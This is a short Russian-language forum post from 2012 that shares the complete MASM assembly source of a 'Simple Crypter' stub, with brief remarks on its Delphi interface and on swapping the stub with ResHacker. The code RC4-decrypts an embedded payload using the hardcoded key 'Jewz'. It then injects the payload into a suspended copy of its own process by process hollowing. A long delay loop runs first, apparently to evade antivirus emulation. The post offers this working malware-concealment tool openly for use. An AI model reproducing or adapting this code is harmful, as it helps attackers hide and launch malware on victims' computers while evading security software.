На делфи лишь кривой ui, стаб на асм как и написано в теме. Менять можно через ресхак (лежит в том же архиве)
Код:
;Name: Simple Crypter
;Coder: Slayer616
;Version 1.0
;Compiled with MASM
.386
.model flat, stdcall
option casemap:none
include \masm32\include\windows.inc
include \masm32\include\kernel32.inc
include \masm32\include\shell32.inc
include \masm32\include\ntdll.inc
includelib \masm32\lib\kernel32.lib
includelib \masm32\lib\shell32.lib
includelib \masm32\lib\ntdll.lib
.data
mPath byte 256 dup (0)
password byte 'Jewz', 0
.data?
hInstance dword ?
loop_stopper dword ?
ResInf dword ?
hResourceSize dword ?
rc4keytable db 256 dup (?)
.code
Rc4_setkey proc Pass:DWORD, LenPass:DWORD
pushad
mov eax, 0FFFEFDFCh
mov ecx, 256/4
Init_rc4keytable:
mov dword ptr [rc4keytable+4*ecx-4], eax
sub eax, 04040404h
dec ecx
jnz Init_rc4keytable
xor eax, eax
mov edi, Pass
Key_return:
xor ebx, ebx
mov esi ,LenPass
jmp New_key
Key_loop:
inc bl
dec esi
jz Key_return
New_key:
mov dl, byte ptr [rc4keytable+ecx]
add al, byte ptr [edi+ebx]
add al, dl
mov dh, byte ptr [rc4keytable+eax]
mov byte ptr [rc4keytable+ecx], dh
mov byte ptr [rc4keytable+eax], dl
inc cl
jnz Key_loop
popad
ret
Rc4_setkey endp
Rc4_crypt proc iData:DWORD, LenData:DWORD
pushad
mov edi, LenData
mov esi, iData
test edi, edi
jz Rc4_enc_exit
xor eax, eax
xor edx, edx
xor ecx, ecx
xor ebx, ebx
Rc4_enc_loop:
inc bl
mov dl, byte ptr [rc4keytable+ebx]
add al, dl
mov cl, byte ptr [rc4keytable+eax]
mov byte ptr [rc4keytable+ebx], cl
mov byte ptr [rc4keytable+eax], dl
add cl, dl
mov cl, byte ptr [rc4keytable+ecx]
xor byte ptr [esi], cl
inc esi
dec edi
jnz Rc4_enc_loop
xor eax, eax
mov edi, offset rc4keytable
mov ecx, 256/4
cld
rep stosd
Rc4_enc_exit:
popad
ret
Rc4_crypt endp
ExtractFile proc
local hResource:dword
LOCAL sinfo: STARTUPINFO
LOCAL pinfo: PROCESS_INFORMATION
LOCAL base: dword
LOCAL sec: ptr IMAGE_SECTION_HEADER
LOCAL cnt: CONTEXT
invoke GetModuleFileName, 0, offset mPath, 256
invoke GetModuleHandle, 0
mov hInstance, eax
invoke FindResource, hInstance, 1212, RT_RCDATA
.if eax != 0
mov hResource, eax
invoke SizeofResource, hInstance, hResource
.if eax != 0
mov hResourceSize, eax
invoke LoadResource, hInstance, hResource
.if eax != 0
invoke LockResource, eax
mov ResInf , eax
invoke lstrlen,addr password
invoke Rc4_setkey,addr password,eax
invoke Rc4_crypt,ResInf,hResourceSize
invoke RtlZeroMemory, addr sinfo, sizeof STARTUPINFO
invoke CreateProcess, offset mPath, 0, 0, 0, 0, CREATE_SUSPENDED, 0, 0, addr sinfo, addr pinfo
invoke RtlZeroMemory, addr cnt, sizeof CONTEXT
mov cnt.ContextFlags, CONTEXT_INTEGER
invoke GetThreadContext, pinfo.hThread, addr cnt
invoke GetModuleHandle, 0
invoke ZwUnmapViewOfSection, pinfo.hProcess, eax
mov edi, ResInf
add edi, IMAGE_DOS_HEADER.e_lfanew[edi]
assume edi: ptr IMAGE_NT_HEADERS
invoke VirtualAllocEx, pinfo.hProcess, [edi].OptionalHeader.ImageBase, [edi].OptionalHeader.SizeOfImage, MEM_COMMIT + MEM_RESERVE, PAGE_EXECUTE_READWRITE
mov base, eax
invoke WriteProcessMemory, pinfo.hProcess, base, ResInf , [edi].OptionalHeader.SizeOfHeaders, 0
lea eax, [edi].OptionalHeader
mov sec, eax
movzx eax, [edi].FileHeader.SizeOfOptionalHeader
add sec, eax
xor eax, eax
xor esi, esi
xor ecx, ecx
.while ( si < [edi].FileHeader.NumberOfSections )
imul eax, esi, sizeof IMAGE_SECTION_HEADER
add eax, sec
mov ebx, base
add ebx, IMAGE_SECTION_HEADER.VirtualAddress[eax]
mov edx, ResInf
add edx, IMAGE_SECTION_HEADER.PointerToRawData[eax]
invoke WriteProcessMemory, pinfo.hProcess, ebx, edx, IMAGE_SECTION_HEADER.SizeOfRawData[eax],0
inc esi
.endw
mov eax, base
add eax, [edi].OptionalHeader.AddressOfEntryPoint
mov cnt.regEax, eax
invoke SetThreadContext, pinfo.hThread, addr cnt
invoke ResumeThread, pinfo.hThread
ret
.endif
.endif
.endif
ExtractFile endp
_entrypoint:
mov loop_stopper,500000000
loop_start:
mov eax,0
push eax
pop eax
cmp loop_stopper, 0
dec loop_stopper
jg loop_start
invoke ExtractFile
invoke ExitProcess, 0
end _entrypoint
17-07-2012
Комбинированный вид
